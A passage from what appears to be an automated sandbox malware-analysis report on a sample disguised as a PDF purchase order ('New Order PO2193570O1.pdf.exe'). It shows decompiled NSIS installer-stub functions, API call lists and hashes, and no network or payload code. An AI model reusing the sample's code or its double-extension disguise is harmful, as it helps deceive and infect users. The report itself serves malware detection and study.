                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064a1
                                                                                                                              0x004064a1
                                                                                                                              0x004064a5
                                                                                                                              0x0040696b
                                                                                                                              0x00000000
                                                                                                                              0x0040696b
                                                                                                                              0x004064ab
                                                                                                                              0x004064ae
                                                                                                                              0x004064b1
                                                                                                                              0x004064b4
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b9
                                                                                                                              0x004064bc
                                                                                                                              0x004064bf
                                                                                                                              0x004064c2
                                                                                                                              0x004064c5
                                                                                                                              0x004064c8
                                                                                                                              0x004064c9
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064ce
                                                                                                                              0x004064d1
                                                                                                                              0x004064d4
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064da
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                              • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                                              • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                              • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                                              0x00405e90
                                                                                                                              0x00405e93
                                                                                                                              0x00405e9a
                                                                                                                              0x00405ea2
                                                                                                                              0x00405eaf
                                                                                                                              0x00000000
                                                                                                                              0x00405eb6
                                                                                                                              0x00405ea5
                                                                                                                              0x00405ead
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405ebe

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 310444273-0
                                                                                                                              • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                              • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                                              • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                              • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                                                              0x00405e6c
                                                                                                                              0x00405e75
                                                                                                                              0x00000000
                                                                                                                              0x00405e82
                                                                                                                              0x00405e78
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,74B5F560), ref: 00405E6C
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2295610775-0
                                                                                                                              • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                              • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                                              • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                              • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0; // 0x55edd0
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t24 =  *0x423eb8; // 0xa1
				_t85 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t76;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423ed8; // 0x5644b8
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                                                                                              0x004036b5
                                                                                                                              0x004036be
                                                                                                                              0x004036c5
                                                                                                                              0x004036c7
                                                                                                                              0x004036db
                                                                                                                              0x004036ed
                                                                                                                              0x004036f7
                                                                                                                              0x004036fc
                                                                                                                              0x00403702
                                                                                                                              0x00403715
                                                                                                                              0x00403715
                                                                                                                              0x00403720
                                                                                                                              0x004036c9
                                                                                                                              0x004036d4
                                                                                                                              0x004036d4
                                                                                                                              0x00403725
                                                                                                                              0x0040372a
                                                                                                                              0x0040372f
                                                                                                                              0x00403738
                                                                                                                              0x0040373d
                                                                                                                              0x0040374e
                                                                                                                              0x004037d5
                                                                                                                              0x004037dd
                                                                                                                              0x004037e6
                                                                                                                              0x004037e6
                                                                                                                              0x004037fc
                                                                                                                              0x00403802
                                                                                                                              0x00403810
                                                                                                                              0x0040389f
                                                                                                                              0x004038a7
                                                                                                                              0x004038b1
                                                                                                                              0x004038b6
                                                                                                                              0x004038bc
                                                                                                                              0x00403946
                                                                                                                              0x0040394b
                                                                                                                              0x0040394d
                                                                                                                              0x00403969
                                                                                                                              0x00000000
                                                                                                                              0x00403969
                                                                                                                              0x0040394f
                                                                                                                              0x00403955
                                                                                                                              0x0040395d
                                                                                                                              0x0040395d
                                                                                                                              0x00000000
                                                                                                                              0x00403955
                                                                                                                              0x004038ca
                                                                                                                              0x004038db
                                                                                                                              0x004038dd
                                                                                                                              0x004038df
                                                                                                                              0x004038e6
                                                                                                                              0x004038e6
                                                                                                                              0x004038ee
                                                                                                                              0x004038f6
                                                                                                                              0x004038f8
                                                                                                                              0x004038fa
                                                                                                                              0x00403903
                                                                                                                              0x00403906
                                                                                                                              0x0040390c
                                                                                                                              0x0040390c
                                                                                                                              0x00403912
                                                                                                                              0x0040392b
                                                                                                                              0x0040393c
                                                                                                                              0x00000000
                                                                                                                              0x00403941
                                                                                                                              0x004038a9
                                                                                                                              0x004038ab
                                                                                                                              0x00000000
                                                                                                                              0x00403816
                                                                                                                              0x00403816
                                                                                                                              0x0040381c
                                                                                                                              0x00403826
                                                                                                                              0x0040382e
                                                                                                                              0x00403838
                                                                                                                              0x0040383e
                                                                                                                              0x0040384c
                                                                                                                              0x0040396e
                                                                                                                              0x0040396e
                                                                                                                              0x00000000
                                                                                                                              0x0040396e
                                                                                                                              0x00403852
                                                                                                                              0x0040385b
                                                                                                                              0x0040389a
                                                                                                                              0x00000000
                                                                                                                              0x0040389a
                                                                                                                              0x00403754
                                                                                                                              0x00403754
                                                                                                                              0x00403759
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040375e
                                                                                                                              0x00403763
                                                                                                                              0x00403773
                                                                                                                              0x00403778
                                                                                                                              0x0040377f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403783
                                                                                                                              0x00403785
                                                                                                                              0x00403792
                                                                                                                              0x00403792
                                                                                                                              0x0040379a
                                                                                                                              0x004037a0
                                                                                                                              0x004037c8
                                                                                                                              0x004037d0
                                                                                                                              0x00000000
                                                                                                                              0x004037b2
                                                                                                                              0x004037b3
                                                                                                                              0x004037bc
                                                                                                                              0x004037c2
                                                                                                                              0x004037c3
                                                                                                                              0x00000000
                                                                                                                              0x004037c3
                                                                                                                              0x004037be
                                                                                                                              0x004037c0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004037c0
                                                                                                                              0x004037a0

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                                • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                                • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                              • lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
                                                                                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ), ref: 00403795
                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
                                                                                                                              • GetFileAttributesA.KERNEL32(Call), ref: 004037B3
                                                                                                                              • LoadImageA.USER32 ref: 004037FC
                                                                                                                                • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                              • RegisterClassA.USER32 ref: 00403843
                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                                              • CreateWindowExA.USER32 ref: 00403894
                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                                              • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                                              • GetClassInfoA.USER32 ref: 004038F6
                                                                                                                              • GetClassInfoA.USER32 ref: 00403903
                                                                                                                              • RegisterClassA.USER32 ref: 0040390C
                                                                                                                              • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                              • String ID: "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                              • API String ID: 914957316-2922021723
                                                                                                                              • Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                                              • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                                              • Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                                              • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\New Order PO2193570O1.pdf.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\hardz\\Desktop\\New Order PO2193570O1.pdf.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\New Order PO2193570O1.pdf.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					__eflags =  *0x423eb4; // 0x30400
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0x30400
							_t65 = E004031F1(_t63 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x49d5c
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					_t77 = E004031BF( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0x30400
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0x30400
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
